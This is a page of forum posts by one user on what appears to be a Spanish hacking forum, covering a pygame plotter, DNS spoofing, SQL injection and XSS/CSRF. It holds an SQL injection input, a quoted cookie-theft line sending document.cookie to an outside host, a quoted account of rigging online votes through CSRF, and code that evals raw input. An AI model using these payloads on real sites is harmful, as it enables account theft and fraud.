Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - braulio--

#311
Cita de: Yoyahack en 21 Febrero 2010, 20:48 PM
Naaa, yo creo que usan la librería GD..
PHP & GD.
Y usan Data Mining en el foro.
Bueno, eso es lo que yo creo...

Otra cosa Castg!, es posible que tu firma sea vulnerable a XSS y afecte a tu web, al tratar de leer el nombre de usuario y visualizarlo pueda ser que se ejecute XSS, no se ejecuta porque en el foro pasan el nombre de usuario por htmlentities y tu imagen toma el valor del nick  ya pasado por htmlentities del foro.
XSS en el texto de una imagen? LOL . Me parece que eso no es posible.
#312
Pues pongo este programa para los que les interese esto de pygame. Cualquier duda pregunten.
Para probarlo necesitan tener pygame instalado.
Os pongo una captura de pantalla de como va :

Código (python) [Seleccionar]

#!/usr/bin/python
import pygame,random
xp,yp = 400,400
pantalla = pygame.display.set_mode((xp,yp))
pantalla.fill((255,255,255))
for x in range(0,xp,20):
 pygame.draw.line(pantalla, (0,0,0) , (x, 1), (x, 800))
for y in range(0,yp,20):
 pygame.draw.line(pantalla, (0,0,0) , (1, y), (800, y))
pygame.draw.line(pantalla,(0,0,0), (yp/2,0),(yp/2,xp),4)
pygame.draw.line(pantalla,(0,0,0), (0,xp/2),(yp,xp/2),4)
pygame.draw.circle(pantalla, (0,0,0), (xp/2,yp/2),5)
pygame.display.flip()
#### La pantalla esta cargada totalmente a partir de aqui
while 1:
colora,colorb,colorc = random.randint(0,250),random.randint(0,250),random.randint(0,250)
funcion = raw_input("f(x)= ")
listacoordenadas = []
for x in range(-6,7):
 listacoordenadas.append((x*20+xp/2,yp/2-eval(funcion)*20))
for indice in range(len(listacoordenadas)-1):
 pygame.draw.line(pantalla,(colora,colorb,colorc), listacoordenadas[indice],listacoordenadas[indice+1],4)
pygame.display.flip()
raw_input()

 
#313
Hacking / Re: ok, estoy en el router..
20 Febrero 2010, 18:37 PM
Lo de los DNS lo puedes usar para falsear dns.
Esto quiere decir que cuando un cliente de esa red haga una petición a un dominio cualquiera, tu podrás devolverle la ip que quieras y llevarle a un falso server.
#314
Cita de: luiggy2 en 18 Febrero 2010, 18:12 PM
Me lo voy a poner en la firma.

Saludos!
Yo lo haré también.
#315
Yo estoy totalmente de acuerdo, he visto varios usuarios que saben un montón de esto.
#316
Nivel Web / Re: Como lograr este SQL inyection??
8 Febrero 2010, 18:15 PM
Cita de: Amerikano|Cls en  8 Febrero 2010, 00:40 AM
Bueno, gracias por responder  ;), he intentado las opciones que me cuentan pero no consigo nada todavia, seguire mirando a ver que puedo hacer  :xD

Salu2
Tengo entendido que está programado por tí, no puedes hacer

out.write("select * from empleado where Codigo_empleado="+codigoEmpleado+" and Password_empleado="+password);

Y así ves mejor por qué no funciona?
#317
Nivel Web / Re: Como lograr este SQL inyection??
7 Febrero 2010, 18:26 PM
Y si pones como código empleado blabla" or 1=1-- ?
#318
Nivel Web / Re: vulnerabilidad en hi5 beta
31 Enero 2010, 11:02 AM
SDC trabajaba en hi5 así que me da la ligera impresión de que no vas a encontrar nada.
#319
Nivel Web / Re: Duda sobre xss
25 Enero 2010, 18:05 PM
Yo hablo de estas cosas que dijiste :
Citar
No entiendes bien, Cuando inserto una img con BBCODE estoy haciendo una peticion GET, pero cuando uso por ejemplo, <img <src=""> o un iframe estoy haciendo una peticion post. Si quieres puedes hacer una prueba..

1. El  navegador no interpreta BBCODE, el  que "interpreta" (lo que hace en realidad es transformar a html) el BBCODE es el software SMF (o el que sea), por lo tanto, cuando escribes en bbcode las tags img se transforman en el html resultante <img src=url>... .
2. La peticiones a imágenes y a iframe son siempre por GET (quizás no siempre, no lo sé , pero en este caso sí)

Y lo otro que dijiste :
Citar
Y otra cosa, Yo no estoy ejecutando ‭‬javascript en la img, lo que estoy haciendo es hacer una peticion a un archivo y ese archivo con tiene un codigo ‭‬javascript, osea el ‭‬javascript se esta ejecutando en el host que tengo el archivo con ‭‬javascript y no en la pagina que quiero atakar.
El javascript, no se ejecuta en el host que tienes el archivo, porque eso es el server, y además , la petición la haces haciendo creer al browser que lo que pide es una imagen, por lo tanto no busca código javascript dentro de ella y no puedes hacer nada con javascript.
#320
Nivel Web / Re: Duda sobre xss
25 Enero 2010, 17:45 PM
Cita de: yoyahack en 24 Enero 2010, 22:48 PM
Cita de: braulio23 en 24 Enero 2010, 22:18 PM
Cita de: yoyahack en 24 Enero 2010, 21:54 PM
Cita de: cɐstg en 24 Enero 2010, 21:49 PM
asi de facil se ejecuta ‭‬‭‬‭‬‭‬‭‬‭‬javascript en una imgaen :s seria muy facil robar cookies...

No entiendes bien, Cuando inserto una img con BBCODE estoy haciendo una peticion GET, pero cuando uso por ejemplo, <img <src=""> o un iframe estoy haciendo una peticion post. Si quieres puedes hacer una prueba..

Y otra cosa, Yo no estoy ejecutando ‭‬‭‬‭‬‭‬javascript en la img, lo que estoy haciendo es hacer una peticion a un archivo y ese archivo con tiene un codigo ‭‬‭‬‭‬‭‬javascript, osea el ‭‬‭‬‭‬‭‬javascript se esta ejecutando en el host que tengo el archivo con ‭‬‭‬‭‬‭‬javascript y no en la pagina que quiero atakar.
Y es verdad, no me fijé, el ‭‬‭‬‭‬javascript no se ejecuta en el server.
Claro tio...
Pueden mirar este post que hay un tema parecido pero por POST.
http://foro.elhacker.net/nivel_web/problema_xsrf-t277033.0.html

La mejor forma de comprenderlo es practicandolo y veras su gran potencial... Una vez lo use para unas votaciones online y puse la url entre tags de img de BBCODE y funcionaba correctamente...
Pueden provarlo en localhost...

Cita de: cɐstg en 24 Enero 2010, 22:15 PM
estas ejecutando el codigo ‭‬‭‬javascript "document.topic.submit()" eso es ‭‬‭‬javascript, y se fuera como vos decis yo te pongo, "window.location = 'miweb.com/cookie?c='+document.cookie"

Claro tio funcionara perfectamente pero se estara ejecutando en el serve donde subas el archivo con ese codigo ‭‬javascript y no con el serve que quieres atakar. Osea te estas robando tus propias cookies y enviandotelas xD.
Eso si lo llamas en plan [nobbcode][nobbcode] :
No funciona
Porque el javascript lo ejecuta solo el navegador, y si el navegador cree que eso es una imagen no buscará código javascript. El document.form.submit() lo hace el navegador no el server.